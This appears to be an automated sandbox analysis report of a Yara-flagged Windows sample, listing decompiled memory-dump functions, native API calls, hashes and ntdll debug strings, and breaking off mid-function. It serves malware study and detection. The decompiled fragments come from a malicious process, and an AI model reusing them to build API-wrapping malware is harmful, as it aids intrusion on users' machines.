                                                                                          • Opcode ID: 8402c606e77c6921248d212a174eaae0933a3a708fed29372fd17cf814b8da94
                                                                                          • Instruction ID: bbc447a7ab747c9906ec03a7555523bf1951166e4318d049cab9b4e1d812ad52
                                                                                          • Opcode Fuzzy Hash: 8402c606e77c6921248d212a174eaae0933a3a708fed29372fd17cf814b8da94
                                                                                          • Instruction Fuzzy Hash: 4FF08CB1200208AFDB14CF98CC80EEB37A9FF88350F01860DFE0897240C630E811CBA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E004183B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                          				long _t14;
                                                                                          
                                                                                          				_t3 = _a4 + 0xc60; // 0xca0
                                                                                          				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                          				return _t14;
                                                                                          			}





                                                                                          APIs
                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateMemoryVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 2167126740-0
                                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                          • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                          • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                          • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                          • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: c2e0dfc19b90c8ee358080d264224f82b8ea33d8b1b72a718bda1098740940a5
                                                                                          • Instruction ID: 69e650abbcb0f02cbad76c3c5f8dea905aae3892337b21920fb63cc1aaa80eda
                                                                                          • Opcode Fuzzy Hash: c2e0dfc19b90c8ee358080d264224f82b8ea33d8b1b72a718bda1098740940a5
                                                                                          • Instruction Fuzzy Hash: EAC080B51083441BCB10EBA4A4C34D77754FFE175CB14494FECA942643D77DD7515285
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          APIs
                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID: E|@D
                                                                                          • API String ID: 621844428-1370303659
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                                                          				void* _t10;
                                                                                          
                                                                                          				E00418DD0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                          				_t6 =  &_a8; // 0x413526
                                                                                          				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                                                          				return _t10;
                                                                                          			}





                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID: &5A
                                                                                          • API String ID: 1279760036-1617645808
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 74%
                                                                                          			E00407216(void* __esi, void* __eflags, intOrPtr* _a4, long _a8, intOrPtr _a16) {
                                                                                          				char _v63;
                                                                                          				char _v64;
                                                                                          				char _v520;
                                                                                          				void* __ebp;
                                                                                          				void* _t13;
                                                                                          				void* _t17;
                                                                                          				int _t18;
                                                                                          				short* _t27;
                                                                                          				long _t36;
                                                                                          				int _t42;
                                                                                          				void* _t46;
                                                                                          				void* _t49;
                                                                                          
                                                                                          				asm("das");
                                                                                          				if(__eflags > 0) {
                                                                                          					_t46 = _t49;
                                                                                          					_push(__esi);
                                                                                          					_v64 = 0;
                                                                                          					E00419D30( &_v63, 0, 0x3f);
                                                                                          					E0041A910( &_v64, 3);
                                                                                          					_t17 = E00409B30(__eflags, _a8 + 0x1c,  &_v64); // executed
                                                                                          					_t18 = E00413E40( &_v64, _a8 + 0x1c, _t17, 0, 0, 0xc4e7b6d6);
                                                                                          					_t42 = _t18;
                                                                                          					__eflags = _t42;
                                                                                          					if(_t42 != 0) {
                                                                                          						_t36 = _a8;
                                                                                          						_t18 = PostThreadMessageW(_t36, 0x111, 0, 0); // executed
                                                                                          						__eflags = _t18;
                                                                                          						if(__eflags == 0) {
                                                                                          							_t18 =  *_t42(_t36, 0x8003, _t46 + (E00409290(__eflags, 1, 8) & 0x000000ff) - 0x40, _t18);
                                                                                          						}
                                                                                          					}
                                                                                          					return _t18;
                                                                                          				} else {
                                                                                          					asm("out dx, al");
                                                                                          					if(__eflags >= 0) {
                                                                                          						while(1) {
                                                                                          							_t27 = _t27 - 2;
                                                                                          							_t13 = _t13 - 1;
                                                                                          							if(_t13 == 0) {
                                                                                          								break;
                                                                                          							}
                                                                                          							if( *_t27 != 0x5c) {
                                                                                          								 *_t27 = 0;
                                                                                          								continue;
                                                                                          							}
                                                                                          							break;
                                                                                          						}
                                                                                          						E00419CB0(_a16,  &_v520, E00419FA0( &_v520) + _t22);
                                                                                          						return 0;
                                                                                          					} else {
                                                                                          						__esi = __esi - 1;
                                                                                          						_pop(es);
                                                                                          						asm("insb");
                                                                                          						__ebp = __esp;
                                                                                          						__ecx = E004195E0(__ecx);
                                                                                          						__eflags = __ecx;
                                                                                          						if(__ecx == 0) {
                                                                                          							L11:
                                                                                          							__eax = 0;
                                                                                          							__eflags = 0;
                                                                                          							return 0;
                                                                                          						} else {
                                                                                          							__eflags = __ecx - 0x33333333;
                                                                                          							if(__ecx == 0x33333333) {
                                                                                          								goto L11;
                                                                                          							} else {
                                                                                          								_a4 =  *_a4;
                                                                                          								__eax =  *_a4 + __ecx;
                                                                                          								__eflags = __eax;
                                                                                          								return __eax;
                                                                                          							}
                                                                                          						}
                                                                                          					}
                                                                                          				}
                                                                                          			}
















                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID:
                                                                                          • API String ID: 1836367815-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 82%
                                                                                          			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                          				char _v67;
                                                                                          				char _v68;
                                                                                          				void* _t12;
                                                                                          				intOrPtr* _t13;
                                                                                          				int _t14;
                                                                                          				long _t21;
                                                                                          				intOrPtr* _t25;
                                                                                          				void* _t26;
                                                                                          				void* _t30;
                                                                                          
                                                                                          				_t30 = __eflags;
                                                                                          				_v68 = 0;
                                                                                          				E00419D30( &_v67, 0, 0x3f);
                                                                                          				E0041A910( &_v68, 3);
                                                                                          				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                                          				_t13 = E00413E40( &_v68, _a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                          				_t25 = _t13;
                                                                                          				if(_t25 != 0) {
                                                                                          					_t21 = _a8;
                                                                                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                          					_t32 = _t14;
                                                                                          					if(_t14 == 0) {
                                                                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                          					}
                                                                                          					return _t14;
                                                                                          				}
                                                                                          				return _t13;
                                                                                          			}













                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID:
                                                                                          • API String ID: 1836367815-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID:
                                                                                          • API String ID: 1836367815-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 16%
                                                                                          			E004185E9(void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24) {
                                                                                          				void* _v0;
                                                                                          
                                                                                          				_push(ds);
                                                                                          				asm("enter 0x5198, 0x5e");
                                                                                          				if (__eflags < 0) goto L3;
                                                                                          			}





                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                          				char* _v8;
                                                                                          				struct _EXCEPTION_RECORD _v12;
                                                                                          				struct _OBJDIR_INFORMATION _v16;
                                                                                          				char _v536;
                                                                                          				void* _t15;
                                                                                          				struct _OBJDIR_INFORMATION _t17;
                                                                                          				struct _OBJDIR_INFORMATION _t18;
                                                                                          				void* _t30;
                                                                                          				void* _t31;
                                                                                          				void* _t32;
                                                                                          
                                                                                          				_v8 =  &_v536;
                                                                                          				_t15 = E0041AB60( &_v12, 0x104, _a8);
                                                                                          				_t31 = _t30 + 0xc;
                                                                                          				if(_t15 != 0) {
                                                                                          					_t17 = E0041AF80(__eflags, _v8);
                                                                                          					_t32 = _t31 + 4;
                                                                                          					__eflags = _t17;
                                                                                          					if(_t17 != 0) {
                                                                                          						E0041B200( &_v12, 0);
                                                                                          						_t32 = _t32 + 8;
                                                                                          					}
                                                                                          					_t18 = E00419310(_v8);
                                                                                          					_v16 = _t18;
                                                                                          					__eflags = _t18;
                                                                                          					if(_t18 == 0) {
                                                                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                          						return _v16;
                                                                                          					}
                                                                                          					return _t18;
                                                                                          				} else {
                                                                                          					return _t15;
                                                                                          				}
                                                                                          			}














                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                          • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                          • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 58%
                                                                                          			E00418633(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16, void* _a207838738) {
                                                                                          				intOrPtr _t15;
                                                                                          				int _t18;
                                                                                          
                                                                                          				asm("insb");
                                                                                          				asm("popad");
                                                                                          				_t15 = _a4;
                                                                                          				E00418DD0(_t15, _t15 + 0xc8c,  *((intOrPtr*)(_t15 + 0xa18)), 0, 0x46);
                                                                                          				_t18 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                          				return _t18;
                                                                                          			}






                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          • Opcode ID: 90f318868fda79be8194bb452e3e2daf2a668c7fb4fe5bb8a769f3d761686a4f
                                                                                          • Instruction ID: 4760727413bcc44461471d0cbbd1d5dbe71ba29d5a1f9263521f6d69c359e195
                                                                                          • Opcode Fuzzy Hash: 90f318868fda79be8194bb452e3e2daf2a668c7fb4fe5bb8a769f3d761686a4f
                                                                                          • Instruction Fuzzy Hash: 81F0E5712002046FCB10DF94DC41EEB37A9DF86360F108158FD4857282C570E8118BE1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                          				char _t10;
                                                                                          
                                                                                          				_t3 = _a4 + 0xc74; // 0xc74
                                                                                          				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                          				return _t10;
                                                                                          			}





                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                          • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                          • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                          				intOrPtr _t7;
                                                                                          				int _t10;
                                                                                          
                                                                                          				_t7 = _a4;
                                                                                          				E00418DD0(_t7, _t7 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
                                                                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                          				return _t10;
                                                                                          			}






                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                          • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                          • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00418520(intOrPtr _a4, int _a8) {
                                                                                          
                                                                                          				_t5 = _a4;
                                                                                          				E00418DD0(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                          				ExitProcess(_a8);
                                                                                          			}




                                                                                          APIs
                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID:
                                                                                          • API String ID: 621844428-0
                                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                          • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                          • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          • Opcode ID: 6f536b0b01077d86152a2a3cf023b86940099eef3e14c1d7fc89a8486a09fe24
                                                                                          • Instruction ID: ee1d7efd5f3ea44847b9cd03a0cf9f7254f66b341a6ca6350b49b3692a2dcd93
                                                                                          • Opcode Fuzzy Hash: 6f536b0b01077d86152a2a3cf023b86940099eef3e14c1d7fc89a8486a09fe24
                                                                                          • Instruction Fuzzy Hash: 4EC08CBA64051C9FC620FA95E8089E7B39A9F85311320865AD85C1271099328DAA45A0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 5f5ad39bc7cc6e3ccd1efaa720b834c6a8d51c514f65b98fd1c5fd7f06491840
                                                                                          • Instruction ID: c697d591fda33ce0721a23255b7887cbde82f15feb0b0db1f4cd3d1680da9149
                                                                                          • Opcode Fuzzy Hash: 5f5ad39bc7cc6e3ccd1efaa720b834c6a8d51c514f65b98fd1c5fd7f06491840
                                                                                          • Instruction Fuzzy Hash: 40B09B729014C5C5D715E7A44608F177900B7D0755F16C196E1120645B4778C091F5B5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions

                                                                                          Strings
                                                                                          • The resource is owned shared by %d threads, xrefs: 01BEB37E
                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01BEB476
                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01BEB2DC
                                                                                          • read from, xrefs: 01BEB4AD, 01BEB4B2
                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01BEB305
                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01BEB39B
                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01BEB48F
                                                                                          • The instruction at %p referenced memory at %p., xrefs: 01BEB432
                                                                                          • *** enter .cxr %p for the context, xrefs: 01BEB50D
                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01BEB2F3
                                                                                          • an invalid address, %p, xrefs: 01BEB4CF
                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01BEB323
                                                                                          • <unknown>, xrefs: 01BEB27E, 01BEB2D1, 01BEB350, 01BEB399, 01BEB417, 01BEB48E
                                                                                          • The critical section is owned by thread %p., xrefs: 01BEB3B9
                                                                                          • *** then kb to get the faulting stack, xrefs: 01BEB51C
                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01BEB38F
                                                                                          • The resource is owned exclusively by thread %p, xrefs: 01BEB374
                                                                                          • Go determine why that thread has not released the critical section., xrefs: 01BEB3C5
                                                                                          • write to, xrefs: 01BEB4A6
                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01BEB484
                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01BEB53F
                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01BEB3D6
                                                                                          • This failed because of error %Ix., xrefs: 01BEB446
                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01BEB47D
                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01BEB352
                                                                                          • *** Inpage error in %ws:%s, xrefs: 01BEB418
                                                                                          • a NULL pointer, xrefs: 01BEB4E0
                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01BEB314
                                                                                          • *** enter .exr %p for the exception record, xrefs: 01BEB4F1
                                                                                          • The instruction at %p tried to %s , xrefs: 01BEB4B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                          • API String ID: 0-108210295
                                                                                          • Opcode ID: 407acb99f82888eb3c02dea6052804234a0801e1aa8445fd8cb31bd28cfa89e5
                                                                                          • Instruction ID: db7348d478babc684a2c05f31147cd011aa753bdf0d8abb92a63b1a0475eb610
                                                                                          • Opcode Fuzzy Hash: 407acb99f82888eb3c02dea6052804234a0801e1aa8445fd8cb31bd28cfa89e5
                                                                                          • Instruction Fuzzy Hash: 60810135A40220FFDF2D6A4ACD8ED6B3BB5EF56B52F4000CDF5082B122D3619541CAB2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 44%
                                                                                          			E01BF1C06() {
                                                                                          				signed int _t27;
                                                                                          				char* _t104;
                                                                                          				char* _t105;
                                                                                          				intOrPtr _t113;
                                                                                          				intOrPtr _t115;
                                                                                          				intOrPtr _t117;
                                                                                          				intOrPtr _t119;
                                                                                          				intOrPtr _t120;
                                                                                          
                                                                                          				_t105 = 0x1b148a4;
                                                                                          				_t104 = "HEAP: ";
                                                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                          					_push(_t104);
                                                                                          					E01B3B150();
                                                                                          				} else {
                                                                                          					E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          				}
                                                                                          				_push( *0x1c2589c);
                                                                                          				E01B3B150("Heap error detected at %p (heap handle %p)\n",  *0x1c258a0);
                                                                                          				_t27 =  *0x1c25898; // 0x0
                                                                                          				if(_t27 <= 0xf) {
                                                                                          					switch( *((intOrPtr*)(_t27 * 4 +  &M01BF1E96))) {
                                                                                          						case 0:
                                                                                          							_t105 = "heap_failure_internal";
                                                                                          							goto L21;
                                                                                          						case 1:
                                                                                          							goto L21;
                                                                                          						case 2:
                                                                                          							goto L21;
                                                                                          						case 3:
                                                                                          							goto L21;
                                                                                          						case 4:
                                                                                          							goto L21;
                                                                                          						case 5:
                                                                                          							goto L21;
                                                                                          						case 6:
                                                                                          							goto L21;
                                                                                          						case 7:
                                                                                          							goto L21;
                                                                                          						case 8:
                                                                                          							goto L21;
                                                                                          						case 9:
                                                                                          							goto L21;
                                                                                          						case 0xa:
                                                                                          							goto L21;
                                                                                          						case 0xb:
                                                                                          							goto L21;
                                                                                          						case 0xc:
                                                                                          							goto L21;
                                                                                          						case 0xd:
                                                                                          							goto L21;
                                                                                          						case 0xe:
                                                                                          							goto L21;
                                                                                          						case 0xf:
                                                                                          							goto L21;
                                                                                          					}
                                                                                          				}
                                                                                          				L21:
                                                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                          					_push(_t104);
                                                                                          					E01B3B150();
                                                                                          				} else {
                                                                                          					E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          				}
                                                                                          				_push(_t105);
                                                                                          				E01B3B150("Error code: %d - %s\n",  *0x1c25898);
                                                                                          				_t113 =  *0x1c258a4; // 0x0
                                                                                          				if(_t113 != 0) {
                                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                          						_push(_t104);
                                                                                          						E01B3B150();
                                                                                          					} else {
                                                                                          						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          					}
                                                                                          					E01B3B150("Parameter1: %p\n",  *0x1c258a4);
                                                                                          				}
                                                                                          				_t115 =  *0x1c258a8; // 0x0
                                                                                          				if(_t115 != 0) {
